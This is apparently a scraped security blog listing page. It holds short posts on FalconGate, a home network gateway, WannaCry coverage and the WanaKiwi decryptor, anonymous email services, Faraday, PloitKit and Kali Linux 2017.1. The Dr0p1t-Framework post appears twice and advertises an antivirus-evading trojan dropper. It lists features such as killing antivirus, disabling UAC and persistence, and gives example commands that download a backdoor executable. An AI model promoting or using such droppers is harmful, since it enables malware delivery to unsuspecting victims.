A smart gateway to stop hackers and Malware attacks - FalconGate

A smart gateway to stop hackers, Malware and more...

Motivation

Cyber attacks are on the raise. Hacker and cyber criminals are continuously improving their methods and building new tools and Malware with the purpose of hacking your network, spying on you and stealing valuable data. Recently a new business model has become popular among hackers: the use of Ransomware to encrypt your data and ask for a ransom to unlock it. These attacks have extended also to the Internet of Things (IoT) devices since many of them are vulnerable by design and hackers can leverage them to compromise other devices in your network or launch DDoS attacks towards other targets. Traditionally securing a network against such attacks has been an expensive item which could be afforded just by medium to large companies. With FalconGate we're aiming to change this and bring "out of the box" security for free to people, small businesses and anyone else in need.

Features

FalconGate is an open source smart gateway which can protect your home devices against hackers, Malware like Ransomeware and other threats. It detects and alerts on hacker intrusions on your home network as well as other devices misbehaving and attacking targets within your network or in the Internet.
Currently FalconGate is able to:

• Block several types of Malware based on open source blacklists (see detailed list in file intel-sources.md )
• Block Malware using the Tor network
• Detect and report potential Malware DNS requests based on VirusTotal reports
• Detect and report the presence of Malware executables and other components based on VirusTotal reports
• Detect and report Domain Generation Algorithm (DGA) Malware patterns
• Detect and report on Malware spamming activity
• Detect and report on internal and outbound port scans
• Report details of all new devices connected to your network
• Block ads based on open source lists
• Monitor a custom list of personal or family accounts used in online services for public reports of hacking

Getting Started

FalconGate was built on top of other open source software so it has multiple dependencies which must be configured correctly for it to work. The fastest way to get FalconGate up and running is to deploy one of the supported system images from our downloads page .

Supported Platforms

Currently FalconGate has been successfully tested and implemented on Raspberry Pi (RPi 2 model B) and Banana Pi (BPI-M2+) using Raspian Jessie Lite as base image.
Jessie Lite for RPi
Jessie Lite for BPi
It should be compatible with other Debian ARM images as well but this has not been tested yet.

Prerequisites

FalconGate has a number of software dependencies:

• Bro IDS
• Python 2.7
• Nginx
• Dnsmasq
• Exim
• PHP

It depends also on several Python modules (see requirements.txt file for details)

Other dependencies

The devices's malware detection can be enhanced with the utilization of VirusTotal's personal free API
Currently FalconGate uses have i been pwned public API to detect whether credentials and/or other data from personal accounts have been stolen by hackers from third party sites.

Deploying FalconGate from a supported image

This is the fastest way to get FalconGate up and running in your network.

• Download the correct system image for your device from the downloads page .
  
• Extract the image to a folder in your computer.
  
• Write the image to your SD card.
  

You can use the guides below as reference for Raspberry Pi:
Linux
Mac OS
Windows

• Insert the SD card in your device and plug it to any available ethernet port in your router.
  
• Power on your device and wait few minutes until it will acquire the correct configuration for your network.
  
• Login to your router and disable its DHCP server function
  
• Login to FalconGate's web app and configure the email address(es) to be used as recipients for alerts and your VirusTotal API key
  

https://[FalconGate IP address]
Username: admin
Password: falcongate

Usually FalconGate will assign to its administration interface an IP ending in ".2" (e.g. 192.168.0.2) which is derived from the network's gateway IP Change the default password after the first logon to the application

• Navigate to the "Configuration" page and fill in the correct fields

This configuration it's not mandatory but highly desired if you want to unleash FalconGate's full power. In order to obtain a free VirusTotal API key you must register at ( https://www.virustotal.com/ ).

Installing FalconGate from source

Follow the steps below to configure your device and install FalconGate from this repository.

• Download and install the OS image to your Raspberry Pi or Banana Pi device

This is well documented in multiple sources out there.

• Connect to your device via SSH

$ ssh pi@<IP assigned to your RPi>

• Install Git if you don't have it yet

$ sudo apt-get update
$ sudo apt-get install git

• Clone FalconGate's repository to a local folder

$ cd /opt
$ sudo git clone https://github.com/A3sal0n/FalconGate.git

• Run the installation script inside FalconGate's folder

$ cd FalconGate/
$ sudo python install.py

Now you can go for a walk and prepare a coffee or any other beverage of your choice because the installation usually takes some time. The script will print the progress to the console.
The script should finish without issues if you're using the supported platforms. If you're attempting to install FalconGate experimentally to a new hardware platform/OS and you get some errors during the installation you could try to correct the issues manually and continue to execute the steps listed in the installation script.

• Login to your router and disable its DHCP server function

FalconGate was designed to work connected to a router over ethernet. It does not replaces the functions of your router. Instead it becomes a layer of security between your devices and your router. Disabling your router's DHCP allows FalconGate to become the new gateway for all the devices connected to the same router in your VLAN.

• Reboot your device to apply all the configuration changes
  
• Login to FalconGate's web app and configure the email address(es) to be used as recipients for alerts and your VirusTotal API key
  

Deployment

Some important considerations to keep in mind when deploying FalconGate to a real environment: home or production network.

• Change the default SSH password in your Raspberry Pi or Banana Pi devices
• Regenerate the openssh-server certificates for SSH encryption

Limitations

Currently the RPi 2 model B and the Banana Pi M2+ have both a single ethernet interface so the traffic forwarding in the gateway it's done using this single interface. This has an impact in networks with fast Internet connection (e.g. > 50Mb/s). However it's still good enough for the home networks of many people's and even some small businesses.

Download FalconGate

Read More

A Framework That Creates An Advanced FUD Dropper With Some Tricks - Dr0p1t-Framework 1.2

Have you ever heard about trojan droppers ?

In short dropper is type of trojans that downloads other malwares and Dr0p1t gives you the chance to create a dropper that bypass most AVs and have some tricks ;)

Features

• Framework works with Windows and Linux
• Download executable on target system and execute it silently..
• The executable size small compared to other droppers generated the same way
• Self destruct function so that the dropper will kill and delete itself after finishing it work
• Adding executable after downloading it to startup
• Adding executable after downloading it to task scheduler ( UAC not matters )
• Finding and killing the antivirus before running the malware
• Running a custom ( batch|powershell|vbs ) file you have chosen before running the executable
• The ability to disable UAC
• In running powershell scripts it can bypass execution policy
• Using UPX to compress the dropper after creating it
• Choose an icon for the dropper after creating it

Screenshots

On Windows

On Linux (Backbox)

Help menu

Usage: Dr0p1t.py Malware_Url [Options]

options:
  -h, --help   show this help message and exit
  -s           Add your malware to startup (Persistence)
  -t           Add your malware to task scheduler (Persistence)
  -k           Kill antivirus process before running your malware.
  -b           Run this batch script before running your malware. Check scripts folder
  -p           Run this powershell script before running your malware. Check scripts folder
  -v           Run this vbs script before running your malware. Check scripts folder
  --only32     Download your malware for 32 bit devices only
  --only64     Download your malware for 64 bit devices only
  --upx        Use UPX to compress the final file.
  --nouac      Disable UAC on victim device
  --nocompile  Tell the framework to not compile the final file.
  -i           Use icon to the final file. Check icons folder.
  -q           Stay quite ( no banner )
  -u           Check for updates
  -nd          Display less output information

Examples

./Dr0p1t.py https://test.com/backdoor.exe -s -t -k --upx
./Dr0p1t.py https://test.com/backdoor.exe -k -b block_online_scan.bat --only32
./Dr0p1t.py https://test.com/backdoor.exe -s -t -k -p Enable_PSRemoting.ps1
./Dr0p1t.py https://test.com/backdoor.exe -s -t -k --nouac -i flash.ico

Prerequisites

• Python 2 or Python 3.

The recommended version for Python 2 is 2.7.x , the recommended version for Python 3 is 3.5.x and don't use 3.6 because it's not supported yet by PyInstaller

• Python libraries requirements in requirements.txt

Needed dependencies for linux

• Wine
• Python 2.7 on Wine Machine

Note : You must have root access

Installation
if you are on linux and do

git clone https://github.com/D4Vinci/Dr0p1t-Framework
chmod 777 -R Dr0p1t-Framework
cd Dr0p1t-Framework
pip install -r requirements.txt
./Dr0p1t.py

And if you are on windows download it and then do

cd Dr0p1t-Framework
pip install -r requirements.txt
pip install -r windows_requirements.txt
./Dr0p1t.py

Libraries in windows_requirements.txt are used to enable unicodes in windows which will make coloring possible 

Tested on:

• Kali Linux - SANA
• Ubuntu 14.04-16.04 LTS
• Windows 10/8.1/8

Changelog v1.2

• Pyinstaller compiling in Linux using wine
• Pyinstaller compiling in Windows will not use UPX and that will fix the compiling in windows
• Added the ability to disable and bypass UAC
• Updated the antivirus list in the antivirus killer
• Added SelfDestruct function so that the dropper will kill and delete itself after finishing it work 
• Full framework rewrite and recheck to fix errors, typos and replacing some libraries to make the size of the final file smaller
• Started working in some SE tricks to fool the user and there's a lot of good options in the way ;) Stay Tuned

Contact

• Twitter
• Facebook

Download Dr0p1t-Framework

Read More

WannaCry Ransomware Decryption Tool - WanaKiwi

If your PC has been infected by WannaCry – the ransomware that wreaked havoc across the world last Friday – you might be lucky to get your locked files back without paying the ransom of $300 to the cyber criminals.

Adrien Guinet, a French security researcher from Quarkslab, has discovered a way to retrieve the secret encryption keys used by the WannaCry ransomware for free, which works on Windows XP, Windows 7, Windows Vista, Windows Server 2003 and 2008 operating systems.

WannaCry Ransomware Decryption Keys

The WannaCry's encryption scheme works by generating a pair of keys on the victim's computer that rely on prime numbers, a "public" key and a "private" key for encrypting and decrypting the system’s files respectively.
To prevent the victim from accessing the private key and decrypting locked files himself, WannaCry erases the key from the system, leaving no choice for the victims to retrieve the decryption key except paying the ransom to the attacker.

But here's the kicker: WannaCry "does not erase the prime numbers from memory before freeing the associated memory," says Guinet.

Based on this finding, Guinet released a WannaCry ransomware decryption tool, named WannaKey, that basically tries to retrieve the two prime numbers, used in the formula to generate encryption keys from memory, and works on Windows XP only.

Note: Below I have also mentioned another tool, dubbed WanaKiwi, that works for Windows XP to Windows 7.

"It does so by searching for them in the wcry.exe process. This is the process that generates the RSA private key. The main issue is that the CryptDestroyKey and CryptReleaseContext does not erase the prime numbers from memory before freeing the associated memory." says Guinet

So, that means, this method will work only if:

• The affected computer has not been rebooted after being infected.
• The associated memory has not been allocated and erased by some other process.

"In order to work, your computer must not have been rebooted after being infected. Please also note that you need some luck for this to work (see below), and so it might not work in every case!," Guinet says.

"This is not really a mistake from the ransomware authors, as they properly use the Windows Crypto API."
While WannaKey only pulls prime numbers from the memory of the affected computer, the tool can only be used by those who can use those prime numbers to generate the decryption key manually to decrypt their WannaCry-infected PC’s files.

WanaKiwi: WannaCry Ransomware Decryption Tool

Good news is that another security researcher, Benjamin Delpy, developed an easy-to-use tool called "WanaKiwi," based on Guinet's finding, which simplifies the whole process of the WannaCry-infected file decryption.

All victims have to do is download WanaKiwi tool from Github and run it on their affected Windows computer using the command line (cmd).

WanaKiwi works on Windows XP, Windows 7, Windows Vista, Windows Server 2003 and 2008, confirmed Matt Suiche from security firm Comae Technologies, who has also provided some demonstrations showing how to use WanaKiwi to decrypt your files.

Although the tool won't work for every user due to its dependencies, still it gives some hope to WannaCry's victims of getting their locked files back for free even from Windows XP, the aging, largely unsupported version of Microsoft's operating system.


Source:The Hacker News

Download  WanaKiwi

Read More

That's Hitting World Right Now Uses NSA Windows Exploit - WannaCry Ransomware

Earlier today, a massive ransomware campaign hit computer systems of hundreds of private companies and public organizations across the globe – which is believed to be the most massive ransomware delivery campaign to date.

The Ransomware in question has been identified as a variant of ransomware known as WannaCry (also known as 'Wana Decrypt0r,' 'WannaCryptor' or 'WCRY').

Like other nasty ransomware variants, WannaCry also blocks access to a computer or its files and demands money to unlock it.

Once infected with the WannaCry ransomware, victims are asked to pay up to $300 in order to remove the infection from their PCs; otherwise, their PCs render unusable, and their files remain locked.

In separate news, researchers have also discovered a massive malicious email campaign that's spreading the Jaff ransomware at the rate of 5 million emails per hour and hitting computers across the globe.

Ransomware Using NSA's Exploit to Spread Rapidly

What's interesting about this ransomware is that WannaCry attackers are leveraging a Windows exploit harvested from the NSA called EternalBlue, which was dumped by the Shadow Brokers hacking group over a month ago.

Microsoft released a patch for the vulnerability in March (MS17-010), but many users and organizations who did not patch their systems are open to attacks.

The exploit has the capability to penetrate into machines running unpatched version of Windows XP through 2008 R2 by exploiting flaws in Microsoft Windows SMB Server. This is why WannaCry campaign is spreading at an astonishing pace.

Once a single computer in your organization is hit by the WannaCry ransomware, the worm looks for other vulnerable computers and infects them as well.

Infections from All Around the World

In just a few hours, the ransomware targeted over 45,000 computers in 74 countries, including United States, Russia, Germany, Turkey, Italy, Philippines and Vietnam, and that the number was still growing, according to Kaspersky Labs.

According to a report, the ransomware attack has shut down work at 16 hospitals across the UK after doctors got blocked from accessing patient files. Another report says, 85% of computers at the Spanish telecom firm, Telefonica, has get infected with this malware.

Another independent security researcher, MalwareTech, reported that a large number of U.S. organizations (at least 1,600) have been hit by WannaCry, compared to 11,200 in Russia and 6,500 in China.

Screenshots of the WannaCry ransomware with different languages, including English, Spanish, Italian, were also shared online by various users and experts on Twitter.

Bitcoin wallets seemingly associated with WannaCry were reportedly started filling up with cash.

The Spanish computer emergency response organization (CCN-CERT) has even issued an alert that warns users of the "massive attack of ransomware" from WannaCry, saying (translated version):

"The ransomware, a version of WannaCry, infects the machine by encrypting all its files and, using a remote command execution vulnerability through SMB, is distributed to other Windows machines on the same network."

It is unclear how the WannaCry ransomware is infecting systems, but obvious attack vector can be phishing emails or victims visiting a website containing malware.

"Power firm Iberdrola and utility provider Gas Natural were also reported to have suffered from the outbreak.," according to BBC.

How to Protect Yourself from WannaCry

First of all, if you haven't patched your Windows machines and servers against EternalBlue exploit (MS17-010), do it right now.

To safeguard against such ransomware infection, you should always be suspicious of uninvited documents sent an email and should never click on links inside those documents unless verifying the source.

To always have a tight grip on all your important files and documents, keep a good backup routine in place that makes their copies to an external storage device that is not always connected to your PC.

Moreover, make sure that you run an active anti-virus security suite of tools on your system, and most importantly, always browse the Internet safely.


Source: The Hacker News

Read More

20 Sites To Keep Your Identity Hidden - Send Anonymous Emails

The first question to answer here is why go for anonymous email when there are plenty of premium featured and free email services such as Gmail, Outlook and Yahoo! Mail available? Well, privacy and anonymity is a digital right — our digital right. These email services are ‘free’ because of the advertisements.

Although deemed necessary evils, ads are mostly tailored for the visitor or service user, and to do that, service providers need your data to show you advertisements targeted to you and your user group. These are ads that you are most likely to click and/or follow.

Moreover, the disclosure of the motives of secret agencies and their top-secret internet-censoring programs (such as PRISM) has raised concerns among digital privacy advocates. If you want to keep your emails away from prying eyes, this article will introduce to you the many options for sending and receiving anonymous emails.

Anonymous email forms the basic foundation of anonymity over the web. Internet is no secure storage, but you have a say in who has access to your data and who doesn’t. If that is no, anonymous emails is one way to ensure your emails are not trackable online.

Note: Anonymity is not possible on the web without hiding your IP address, so you must use Tor, or any other proxy or VPN service before using the services below to remain anonymous on the Internet.
Encrypted / Anonymous Email Service
Here are some of the anonymous email services that lets you send and receive emails anonymously online. Some of them have encryption features, others are disposable or will self-destruct after a specified period of time. Here are 5.

Anonymous Email – TorGuard – This service provides you an anonymous inbox with lots of privacy and cryptographic features. You get 10MB storage, and end-to-end security using SSL encryption for connection and G/PGP encryption for securing the messages.

Tor Mail – Tor Mail is a Tor Hidden service that provides truly anonymous email service. It runs on the hidden service network of The Tor Project so you must use Tor to access and use it. Tor Mail is developed for super anonymity. As it’s built over the Tor network, it cannot be traced easily.

GuerrilaMail – GuerrillaMail offers you a disposable, self-destructible, temporary email address to send and receive emails anonymously on the internet. Mail is deleted after an hour. You only need to choose an email address; no personal data is required.

Secure Mail – This service encrypts your mail using 4096-bit key, which makes it unreadable by anyone except you. It doesn’t ask for your personal information or IP address to sign up. They also have a zero-tolerance policy against spam.

The Anonymous Email – Create an account to send and receive emails by signing up with your real email. None of your other personal info is necessary.

Send Emails Without Registration

Sometimes you just need to send emails without prior registration. In fact you don’t even need to receive any feedback. If this is you, here are 8 services that is essentially a form where you put in details of the email you want to send. Note that there is no way for the receiver to get back to you.

AnonymousEmail.me – Here you will find only a simple form to fill in the receiver’s address, subject and the email content (you can also attach a file to the email if necessary). To get a reply, opt to provide a reply-to email address, otherwise this is a one-way ticket to sending an anonymous email.

5ymail – Send and receive beautifully formatted messages using its rich-text editor without revealing your true self. You will have to give up a real email to receive your 5ymail inbox credentals. There is also a paid version for more features.

CyberAtlantis – It offers a simple interface to provide the receiver’s email address, subject, and the message. It strips off the IP address from your mail, and thus you can’t be traced easily. It asks for none of your personal information.

W3 Anonymous Remailer – Send anonymous emails to anyone. You only need to enter the receiver’s email address, subject and the message for the email.

Send Anonymous Email – This one operates with a plain interface to enter the sender and receiver’s address, subject and message. No other details are required to send emails with this. The IP addresses are logged in.

Send Email Message – You only need to enter the receiver’s email address, subject, and the message. Over 100,000 anonymous emails are sent every day for free.

AnonEmail – You get to send anonymous emails without revealing any information about your identity.

Receive Emails

If you just need a disposable email to confirm links and don’t want to deal with the newsletter or other deals they might send you in the future, try these 7 email services. Accounts are created automatically when a mail is received for that address.

Anonymous Email – Hide My Ass! – Hide My Ass! offers a free anonymous email account, which can be used to receive (but not send) emails. You can opt for new email received notifications to be sent to your real email or even set your inbox to “self-destruct” with an expiration date. 

myTrashMail – Get open and public email accounts created upon receiving mail or sign up for a private and password-protected one to receive mail. The accounts are temporary and will be deleted automatically after some time.

NotSharingMy.Info – NotSharingMy.Info provides you with a permanent anonymous email address to receive emails without providing any traceable and identifiable information. It only requires your real email address for signing up. All emails to the anonymous email address is forwarded to your real email address.

Mailnesia – Aside from inboxes generated automatically upon receipt of an email, Mailnesia even features an automatic confirmation-links click system which is useful if you make lots of sign-ups on web services.

Mailinator – Here is one that lets you create email inboxes quickly and even automatically. You can only receive emails with it.

Spambog – Spambog offers you a disposable (7-day purge), temporary, anonymous email inbox on the Web. You can receive, reply and forward emails but not send an original one. An email alias can be protected with a password.

TempInbox – Here’s another temporary, disposable, auto-automated email inbox service. Give any email alias to anyone and check that inbox on the website for your incoming mail.

OffSec 2017

Read More

Collaborative Penetration Test and Vulnerability Management Platform - Faraday v2.4

Faraday is the Integrated Multiuser Risk Environment you were looking for! It maps and leverages all the knowledge you generate in real time, letting you track and understand your audits. Our dashboard for CISOs and managers uncovers the impact and risk being assessed by the audit in real-time without the need for a single email. Developed with a specialized set of functionalities that helps users improve their own work, the main purpose is to re-use the available tools in the community taking advantage of them in a collaborative way!

LDAP support

Yes, Faraday’s bucket list is an item shorter as of this release! LDAP support has been on the horizon for quite some time now, but not anymore - this brand new version comes with LDAP support out of the box, no additional modules required, isn’t that neat?

Why LDAP? Well, because a great number of companies around the world use it to centralize their user account management. The protocol provides total control over the credentials in all the platforms, which comes in pretty handy when managing large volumes of data. In fact, LDAP is so popular that some companies have a policy to only use tools that support LDAP authentication.

By adding LDAP support to Faraday, we give our clients the possibility to manage larger teams, implement large-scale installations and maintain a granular and simple control over their user accounts.

In addition, using Faraday over LDAP provides better configuration than ever, allowing complex credential policies such as password expiration and quality standards, or credential lockout.

Faraday Plugin

There are some changes to the Faraday Plugin, improving its functionality by allowing users to run it through the GTK interface, performing actions in batch and filtering objects.

One of the best things about this new version of the Plugin is that you can now use it to script some of the most boring tasks needed in every assessment.

Example of task automation using Faraday Plugin - Running ping for every host that has a service on port 22

We also added a menu option to run directly from GTK!


New menu item in GTK allows users to run Fplugin without having to type anything!
Read more about FPlugin in our documentation

Details are everything

And that is what this release is all about. We believe that correcting very specific details and introducing small improvements also adds quality and efficiency to a platform like ours. So it is in those items that we focused on the last iteration.

Changes

• Added LDAP support for authentication 
• Removed grouping by issue tracker option in status report

• Added command line option to automatically install the license files before launching Faraday 
• Fixed bug when editing workspaces with maximum allowed workspaces reached 
• Improved login in Web UI 
• Improved the validation applied to passwords when editing them in the Web UI

Better password validation

• Improved UX in users list Web UI 
• Improved GTK UX when the client loses connection to the server 

• Added link to name column in Hosts list

Host names with links

• Fixed bug in SQLMap plugin that made the client freeze 
• Fixed bug when creating/updating Credentials 
• Fixed bug in the WEB UI - menu explanation bubbles were hidden behind inputs

• Fixed conflict resolution when the object was deleted from another client before resolving the conflict 
• Improved FPlugin
• Improved the installation process 
• Improved SQLMap plugin to support –tables and –columns options 
• Improved navigation in Web UI 
• Merged PR #137 - CScan improvements: bug fixing, change plugin format and removed unnecessary file output 
• Merged PR #173 - Hostnames: added hostnames to plugins 
• Merged PR #105 - OSint: added the possibility of using a DB other than Shodan 
• The Status Report now remembers the sorting column and order
• Created a requirements_extras.txt file to handle optional packages for specific features

We hope you enjoy it, and let us know if you have any questions or comments.

https://www.faradaysec.com
https://github.com/infobyte/faraday
https://twitter.com/faradaysec 

Download Faraday v2.4

Read More

A Framework That Creates An Advanced FUD Dropper With Some Tricks - Dr0p1t-Framework 1.2

Have you ever heard about trojan droppers ?

In short dropper is type of trojans that downloads other malwares and Dr0p1t gives you the chance to create a dropper that bypass most AVs and have some tricks ;)

Features

• Framework works with Windows and Linux
• Download executable on target system and execute it silently..
• The executable size small compared to other droppers generated the same way
• Self destruct function so that the dropper will kill and delete itself after finishing it work
• Adding executable after downloading it to startup
• Adding executable after downloading it to task scheduler ( UAC not matters )
• Finding and killing the antivirus before running the malware
• Running a custom ( batch|powershell|vbs ) file you have chosen before running the executable
• The ability to disable UAC
• In running powershell scripts it can bypass execution policy
• Using UPX to compress the dropper after creating it
• Choose an icon for the dropper after creating it

Screenshots

On Windows

On Linux (Backbox)

Help menu

Usage: Dr0p1t.py Malware_Url [Options]

options:
  -h, --help   show this help message and exit
  -s           Add your malware to startup (Persistence)
  -t           Add your malware to task scheduler (Persistence)
  -k           Kill antivirus process before running your malware.
  -b           Run this batch script before running your malware. Check scripts folder
  -p           Run this powershell script before running your malware. Check scripts folder
  -v           Run this vbs script before running your malware. Check scripts folder
  --only32     Download your malware for 32 bit devices only
  --only64     Download your malware for 64 bit devices only
  --upx        Use UPX to compress the final file.
  --nouac      Disable UAC on victim device
  --nocompile  Tell the framework to not compile the final file.
  -i           Use icon to the final file. Check icons folder.
  -q           Stay quite ( no banner )
  -u           Check for updates
  -nd          Display less output information

Examples

./Dr0p1t.py https://test.com/backdoor.exe -s -t -k --upx
./Dr0p1t.py https://test.com/backdoor.exe -k -b block_online_scan.bat --only32
./Dr0p1t.py https://test.com/backdoor.exe -s -t -k -p Enable_PSRemoting.ps1
./Dr0p1t.py https://test.com/backdoor.exe -s -t -k --nouac -i flash.ico

Prerequisites

• Python 2 or Python 3.

The recommended version for Python 2 is 2.7.x , the recommended version for Python 3 is 3.5.x and don't use 3.6 because it's not supported yet by PyInstaller

• Python libraries requirements in requirements.txt

Needed dependencies for linux

• Wine
• Python 2.7 on Wine Machine

Note : You must have root access

Installation
if you are on linux and do

git clone https://github.com/D4Vinci/Dr0p1t-Framework
chmod 777 -R Dr0p1t-Framework
cd Dr0p1t-Framework
pip install -r requirements.txt
./Dr0p1t.py

And if you are on windows download it and then do

cd Dr0p1t-Framework
pip install -r requirements.txt
pip install -r windows_requirements.txt
./Dr0p1t.py

Libraries in windows_requirements.txt are used to enable unicodes in windows which will make coloring possible

Tested on:

• Kali Linux - SANA
• Ubuntu 14.04-16.04 LTS
• Windows 10/8.1/8

Changelog v1.2

• Pyinstaller compiling in Linux using wine
• Pyinstaller compiling in Windows will not use UPX and that will fix the compiling in windows
• Added the ability to disable and bypass UAC
• Updated the antivirus list in the antivirus killer
• Added SelfDestruct function so that the dropper will kill and delete itself after finishing it work
• Full framework rewrite and recheck to fix errors, typos and replacing some libraries to make the size of the final file smaller
• Started working in some SE tricks to fool the user and there's a lot of good options in the way ;) Stay Tuned

Contact

• Twitter
• Facebook

Download Dr0p1t-Framework

Read More

The Hacker's ToolBox - PloitKit

PloitKit is a Python based GUI tool designed as one-stop for all other softwares. I was facing these kinds of problem, when I need to switch to different system, or I lost my pen-drive. I have to go to google, and search every tool and download every tool and so on. So I decided to create a tool, in which I just click and click and tool is there.

I have added more than 900+ tools in this tool, but only 400+ is available now, to test will this tool work, if it works I'll make it available for everyone.

Features

1. Auto-Update - No need to come over here, and look for new version every time.
2. Better Error Handling - Some tools may cause error, that's why I added this option.
3. Graphical Interface - For just click & click.
4. Malware Protectiong - All tools are downloaded from their original source, so no malwares or any viruses.
5. Multi-Platform - Many tools are for designed differently for Mac, Windows & Linux, so I added option for that. Choose your platform and you're good to go.
6. Better organised - Everything is better organised nothing like search everything, and all that mess.

I believe that, nothing can't be perfect, So I added option to report a tool, or send me suggestions about any new tool, I should add.

Usage

git clone https://github.com/rajeshmajumdar/PloitKit.git

Windows

ploitkit.py

UNIX or Mac

python ploitkit.py

Download PloitKit

Read More

Kali Linux 2017.1 Release

Kali Linux is a Debian-based distribution for digital forensics and penetration testing, developed and maintained by Offensive Security. Mati Aharoni and Devon Kearns rewrote BackTrack. Kali Linux is the most versatile and advanced penetration testing tool release operating system. Kali tools are often updated and can be used on other platforms, such as VMware and ARM.

Today, Offensive Security has been released Kali Linux 2017.1.

What’s new?

Support for RTL8812AU Wireless Card Injection
Streamlined Support for CUDA GPU Cracking
Amazon AWS and Micsosoft Azure Availability (GPU Support)
OpenVAS 9 Packaged in Kali Repositories
More info, please visit Kali Linux home page.

How to update to Kali Linux 2017.1

Open terminal and run command

apt update

apt dist-upgrade

reboot

If you want to download Kali Linux image for fresh installing, you can download Kali Linux 2017.1 here

Read More